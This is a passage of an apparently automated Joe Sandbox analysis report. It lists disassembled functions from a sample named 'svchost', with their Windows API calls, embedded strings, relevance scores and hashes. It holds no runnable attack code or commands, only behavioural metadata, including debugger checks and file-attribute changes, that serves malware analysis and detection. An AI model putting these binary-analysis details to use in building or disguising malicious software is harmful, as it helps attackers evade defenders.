                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNELBASE(?,00000000,00000001,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A501
                                                              • Part of subcall function 0083A4ED: SetFileAttributesW.KERNEL32(?,00000000,?,?,00000800,?,0083A325,?,?,?,0083A175,?,00000001,00000000,?,?), ref: 0083A532
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: File$CloseHandle$AttributesCreateDelete_wcslen$BuffersCurrentErrorFlushH_prologLastProcessTime
                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                            • API String ID: 3983180755-3508440684
                                                            • Opcode ID: 7c72512658a4e152c558d803ed632cf8fde9b78ec6cd41ca527b1132cb6f2a2c
                                                            • Instruction ID: 9af5ece249294838c602499daec94c5e0a3af9690c2b409f888a657156070d42
                                                            • Opcode Fuzzy Hash: 7c72512658a4e152c558d803ed632cf8fde9b78ec6cd41ca527b1132cb6f2a2c
                                                            • Instruction Fuzzy Hash: 5BC1EAB1904648AADB35DB78CC45FEEB3A8FF44300F404559F956E3282D774EA48CBA2
                                                            Function 0084F838 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 0084F844
                                                            • IsDebuggerPresent.KERNEL32 ref: 0084F910
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 0084F930
                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0084F93A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                            • String ID:
                                                            • API String ID: 254469556-0
                                                            • Opcode ID: 3d5b839ed7a7828831b0f76f933d9e02ba7717621df90295eff81eb018cbc1fa
                                                            • Instruction ID: 5bccab822ecdb465e293435184e143faf996d7f0bb5d6c8feb044f8e484cd282
                                                            • Opcode Fuzzy Hash: 3d5b839ed7a7828831b0f76f933d9e02ba7717621df90295eff81eb018cbc1fa
                                                            • Instruction Fuzzy Hash: DA312775D0521D9BDB20DFA4D989BCCBBB8FF08304F1040AAE50CAB251EB759B848F45
                                                            Function 0084E6A3 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • VirtualQuery.KERNEL32(80000000,0084E5E8,0000001C,0084E7DD,00000000,?,?,?,?,?,?,?,0084E5E8,00000004,00891CEC,0084E86D), ref: 0084E6B4
                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,0084E5E8,00000004,00891CEC,0084E86D), ref: 0084E6CF
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: InfoQuerySystemVirtual
                                                            • String ID: D
                                                            • API String ID: 401686933-2746444292
                                                            • Opcode ID: 23232bb21eeb47d28a2c96a3cde9181a9ececb5acab03e1aa10f5e5861c7ad7d
                                                            • Instruction ID: ae2bea5678d7b4b11a768d62eceabe1ade9d1d53a1a283e8b3c1dee3bd52669e
                                                            • Opcode Fuzzy Hash: 23232bb21eeb47d28a2c96a3cde9181a9ececb5acab03e1aa10f5e5861c7ad7d
                                                            • Instruction Fuzzy Hash: 6701A77260010D6BDB14DE29DC49BED7BAAFFC4338F0DC124ED59D7154E674D9058690
                                                            Function 00858EBD Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,?), ref: 00858FB5
                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,?), ref: 00858FBF
                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,?), ref: 00858FCC
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                            • String ID:
                                                            • API String ID: 3906539128-0
                                                            • Opcode ID: 2a47fd43cf2518488ae9e142866f68a8071e96c16a3de221e211009efd65fe0b
                                                            • Instruction ID: 0d63afe2a229a991e28b8bf95124e361074b42ffb6ebf39a0d3d21154e3c9c89
                                                            • Opcode Fuzzy Hash: 2a47fd43cf2518488ae9e142866f68a8071e96c16a3de221e211009efd65fe0b
                                                            • Instruction Fuzzy Hash: 6731D77490121C9BCB21DF28D88979CBBB4FF08310F5041EAE91CA6251EB709F858F55
                                                            Function 0085B348 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                            Download Yara Rule
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID: .
                                                            • API String ID: 0-248832578
                                                            • Opcode ID: 986587557649f7e9e09b570ab0cec3c60e33e631effb7769d9076ca8424eba6e
                                                            • Instruction ID: af85841a0a4eca9bd8401c46f6673810e28912c75827a71987d4d74fab00d11b
                                                            • Opcode Fuzzy Hash: 986587557649f7e9e09b570ab0cec3c60e33e631effb7769d9076ca8424eba6e
                                                            • Instruction Fuzzy Hash: F6310271900249AFCB249E78CC84EFB7BBDFB95315F1401A8ED19D7252E7309E498B50
                                                            Function 0084AF0F Relevance: 3.0, APIs: 2, Instructions: 45COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0084AF35
                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,0086E72C,?,?), ref: 0084AF84
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FormatInfoLocaleNumber
                                                            • String ID:
                                                            • API String ID: 2169056816-0
                                                            • Opcode ID: fe72aae90f34b59e250bf2340096bf0438059a9b78d0ee2f60217599c75e17a9
                                                            • Instruction ID: 21d99ea0fcbfa7c8d1ad6dc78d65d7e9699a3170e92c7f73461a4c0ef203bf2f
                                                            • Opcode Fuzzy Hash: fe72aae90f34b59e250bf2340096bf0438059a9b78d0ee2f60217599c75e17a9
                                                            • Instruction Fuzzy Hash: 70017C3A100318AAD7109FA4EC45F9B77BCFF09710F419022FB05EB191E3B0AA18CBA5
                                                            Function 00836C74 Relevance: 3.0, APIs: 2, Instructions: 16windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetLastError.KERNEL32(00836DDF,00000000,00000400), ref: 00836C74
                                                            • FormatMessageW.KERNEL32(00001200,00000000,00000000,00000400,?,?,00000000), ref: 00836C95
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ErrorFormatLastMessage
                                                            • String ID:
                                                            • API String ID: 3479602957-0
                                                            • Opcode ID: d6ae912f23317d5ff1493540ce485f9d54e383b5ead6db987ab447d8804637a5
                                                            • Instruction ID: 909c89295c82e00687686dc29ed90d3ed9f4363a27fde7d4ec5080cc7febf26a
                                                            • Opcode Fuzzy Hash: d6ae912f23317d5ff1493540ce485f9d54e383b5ead6db987ab447d8804637a5
                                                            • Instruction Fuzzy Hash: 07D0C931348300BFFA110F618D06F6A7B99FF85B51F19E404B795E80E0DBB49439A62A
                                                            Function 0084F654 Relevance: 1.6, APIs: 1, Instructions: 147COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • IsProcessorFeaturePresent.KERNEL32(0000000A), ref: 0084F66A
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: FeaturePresentProcessor
                                                            • String ID:
                                                            • API String ID: 2325560087-0
                                                            • Opcode ID: 4441adab22d9b7a526584aaf82f40b8f827908733432ef273ace5176bcd9ea35
                                                            • Instruction ID: d5b83c6dbe6892f6636181f489e552d33a05c23aa2750fdd65d65394ba3d89f3
                                                            • Opcode Fuzzy Hash: 4441adab22d9b7a526584aaf82f40b8f827908733432ef273ace5176bcd9ea35
                                                            • Instruction Fuzzy Hash: 405180B19046198FEB25CF98E9857AABBF4FB48314F25893ED511EB351D3789900CB90
                                                            Function 0083B146 Relevance: 1.5, APIs: 1, Instructions: 28COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetVersionExW.KERNEL32(?), ref: 0083B16B
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Version
                                                            • String ID:
                                                            • API String ID: 1889659487-0
                                                            • Opcode ID: 9ac2a7d07b4aba6bca0af5197b2af2c11bf1ef9b6ced40d3dc1887253c42bbf8
                                                            • Instruction ID: f91fbe4f2b5b87430bb891ef96b1a1707e30a8fe1cd724a5536261648e144923
                                                            • Opcode Fuzzy Hash: 9ac2a7d07b4aba6bca0af5197b2af2c11bf1ef9b6ced40d3dc1887253c42bbf8
                                                            • Instruction Fuzzy Hash: 2CF03AB8E00A088FDB18CB18ECAA6D973F1FB98315F114295D61993794D7B0E9C49EA1
                                                            Function 0084F9D5 Relevance: 1.5, APIs: 1, Instructions: 3COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • SetUnhandledExceptionFilter.KERNEL32(Function_0001F9F0,0084F3A5), ref: 0084F9DA
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: ExceptionFilterUnhandled
                                                            • String ID:
                                                            • API String ID: 3192549508-0
                                                            • Opcode ID: e6c37ad3c7680b10628dcf2d26584b145e6dfa284c666a16e5832c67d38ebba3
                                                            • Instruction ID: 8c53d6f3e3e7015fa864e53291e0ede59f186ed84ed2770a425d538cc232be6d
                                                            • Opcode Fuzzy Hash: e6c37ad3c7680b10628dcf2d26584b145e6dfa284c666a16e5832c67d38ebba3
                                                            • Instruction Fuzzy Hash:
                                                            Function 0085C030 Relevance: 1.3, APIs: 1, Instructions: 5memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: HeapProcess
                                                            • String ID:
                                                            • API String ID: 54951025-0
                                                            • Opcode ID: 3795f6bc234da431ce41f7d9c1119c6b54e3022c1398b6f1223acfeba25bcf6e
                                                            • Instruction ID: 8c270b99a8a7a66523ffb2698f3751c4cc09a0b899697d8a5fc353f3022a6dc2
                                                            • Opcode Fuzzy Hash: 3795f6bc234da431ce41f7d9c1119c6b54e3022c1398b6f1223acfeba25bcf6e
                                                            • Instruction Fuzzy Hash: DEA01130202200AB8B008F30AE082083AA8BA2228030A002AA008C00A0EA2080A0AB00
                                                            Function 0083E2E8 Relevance: 26.5, APIs: 12, Strings: 3, Instructions: 234COMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _swprintf.LIBCMT ref: 0083E30E
                                                              • Part of subcall function 00834092: __vswprintf_c_l.LEGACY_STDIO_DEFINITIONS ref: 008340A5
                                                              • Part of subcall function 00841DA7: WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,000000FF,00000000,00000200,00000000,00000000,?,00871030,00000200,0083D928,00000000,?,00000050,00871030), ref: 00841DC4
                                                            • _strlen.LIBCMT ref: 0083E32F
                                                            • SetDlgItemTextW.USER32(?,0086E274,?), ref: 0083E38F
                                                            • GetWindowRect.USER32(?,?), ref: 0083E3C9
                                                            • GetClientRect.USER32(?,?), ref: 0083E3D5
                                                            • GetWindowLongW.USER32(?,000000F0), ref: 0083E475
                                                            • GetWindowRect.USER32(?,?), ref: 0083E4A2
                                                            • SetWindowTextW.USER32(?,?), ref: 0083E4DB
                                                            • GetSystemMetrics.USER32(00000008), ref: 0083E4E3
                                                            • GetWindow.USER32(?,00000005), ref: 0083E4EE
                                                            • GetWindowRect.USER32(00000000,?), ref: 0083E51B
                                                            • GetWindow.USER32(00000000,00000002), ref: 0083E58D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Window$Rect$Text$ByteCharClientItemLongMetricsMultiSystemWide__vswprintf_c_l_strlen_swprintf
                                                            • String ID: $%s:$CAPTION$d
                                                            • API String ID: 2407758923-2512411981
                                                            • Opcode ID: 158c2cd38ad7c370341c61bec972be951d22f2d5e7a30b9e3561497e60b9343e
                                                            • Instruction ID: b42c50530b88019d0cbed75561fdcf5c0c4b976523bcd239c59d5aa406a03083
                                                            • Opcode Fuzzy Hash: 158c2cd38ad7c370341c61bec972be951d22f2d5e7a30b9e3561497e60b9343e
                                                            • Instruction Fuzzy Hash: 2A818072608301AFD710DFA8CD89A6FBBE9FBC9704F04091DFA84D72A0D675E9058B52
                                                            Function 0085CB22 Relevance: 19.6, APIs: 13, Instructions: 114COMMONLIBRARYCODE
                                                            Download Yara Rule
                                                            APIs
                                                            • ___free_lconv_mon.LIBCMT ref: 0085CB66
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C71E
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C730
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C742
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C754
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C766
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C778
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C78A
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C79C
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7AE
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7C0
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7D2
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7E4
                                                              • Part of subcall function 0085C701: _free.LIBCMT ref: 0085C7F6
                                                            • _free.LIBCMT ref: 0085CB5B
                                                              • Part of subcall function 00858DCC: RtlFreeHeap.NTDLL(00000000,00000000,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34), ref: 00858DE2
                                                              • Part of subcall function 00858DCC: GetLastError.KERNEL32(00863A34,?,0085C896,00863A34,00000000,00863A34,00000000,?,0085C8BD,00863A34,00000007,00863A34,?,0085CCBA,00863A34,00863A34), ref: 00858DF4
                                                            • _free.LIBCMT ref: 0085CB7D
                                                            • _free.LIBCMT ref: 0085CB92
                                                            • _free.LIBCMT ref: 0085CB9D
                                                            • _free.LIBCMT ref: 0085CBBF
                                                            • _free.LIBCMT ref: 0085CBD2
                                                            • _free.LIBCMT ref: 0085CBE0
                                                            • _free.LIBCMT ref: 0085CBEB
                                                            • _free.LIBCMT ref: 0085CC23
                                                            • _free.LIBCMT ref: 0085CC2A
                                                            • _free.LIBCMT ref: 0085CC47
                                                            • _free.LIBCMT ref: 0085CC5F
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                            • String ID:
                                                            • API String ID: 161543041-0
                                                            • Opcode ID: b289708b82d21e55144256aaf5e41fa563ebcfc86dd94396585da9526bb9c416
                                                            • Instruction ID: ddd9bda340a654fdb53cf803b45a9e1cca250640fa9c4da80ed27d29e0afe1f7
                                                            • Opcode Fuzzy Hash: b289708b82d21e55144256aaf5e41fa563ebcfc86dd94396585da9526bb9c416
                                                            • Instruction Fuzzy Hash: FE312E31600309DFEB21AA7DD846B5A7BF9FF10362F14541AE958E7192DE35AC48CF12
                                                            Function 00849711 Relevance: 15.9, APIs: 5, Strings: 4, Instructions: 126memoryCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • _wcslen.LIBCMT ref: 00849736
                                                            • _wcslen.LIBCMT ref: 008497D6
                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 008497E5
                                                            • WideCharToMultiByte.KERNEL32(0000FDE9,00000000,00000000,000000FF,00000003,?,00000000,00000000), ref: 00849806
                                                            • CreateStreamOnHGlobal.COMBASE(00000000,00000001,?), ref: 0084982D
                                                            Strings
                                                            Memory Dump Source
                                                            • Source File: 00000002.00000002.2107591889.0000000000831000.00000020.00000001.01000000.00000006.sdmp, Offset: 00830000, based on PE: true
                                                            • Associated: 00000002.00000002.2107577820.0000000000830000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107616904.0000000000863000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.000000000086E000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000875000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107639557.0000000000892000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                            • Associated: 00000002.00000002.2107965623.0000000000893000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_2_2_830000_svchost.jbxd
                                                            Similarity
                                                            • API ID: Global_wcslen$AllocByteCharCreateMultiStreamWide
                                                            • String ID: </html>$<head><meta http-equiv="content-type" content="text/html; charset=$<html>$utf-8"></head>
                                                            • API String ID: 1777411235-4209811716
                                                            • Opcode ID: 5a23713f07110f0f3cc25ed8e27e8095fdd9deda3accf5e520477edadb6956d8
                                                            • Instruction ID: 6d157f41da370e0ed29f46c6020fb856c4b0a01984bbfb6e6ccb36f796c5c9b7
                                                            • Opcode Fuzzy Hash: 5a23713f07110f0f3cc25ed8e27e8095fdd9deda3accf5e520477edadb6956d8
                                                            • Instruction Fuzzy Hash: C13137325083057AE735AF289C06F6F77D8FF52321F15011DF941D61D2EB649A0883A7
                                                            Function 0084D69E Relevance: 15.8, APIs: 8, Strings: 1, Instructions: 79windowCOMMON
                                                            Download Yara Rule
                                                            APIs
                                                            • GetWindow.USER32(?,00000005), ref: 0084D6C1
                                                            • GetClassNameW.USER32(00000000,?,00000800), ref: 0084D6ED
                                                              • Part of subcall function 00841FBB: CompareStringW.KERNEL32(00000400,00001001,?,000000FF,?,Function_00011FBB,0083C116,00000000,.exe,?,?,00000800,?,?,?,00848E3C), ref: 00841FD1
                                                            • GetWindowLongW.USER32(00000000,000000F0), ref: 0084D709
                                                            • SendMessageW.USER32(00000000,00000173,00000000,00000000), ref: 0084D720
                                                            • GetObjectW.GDI32(00000000,00000018,?), ref: 0084D734
                                                            • SendMessageW.USER32(00000000,00000172,00000000,00000000), ref: 0084D75D
                                                            • DeleteObject.GDI32(00000000), ref: 0084D764
                                                            • GetWindow.USER32(00000000,00000002), ref: 0084D76D
                                                            Strings
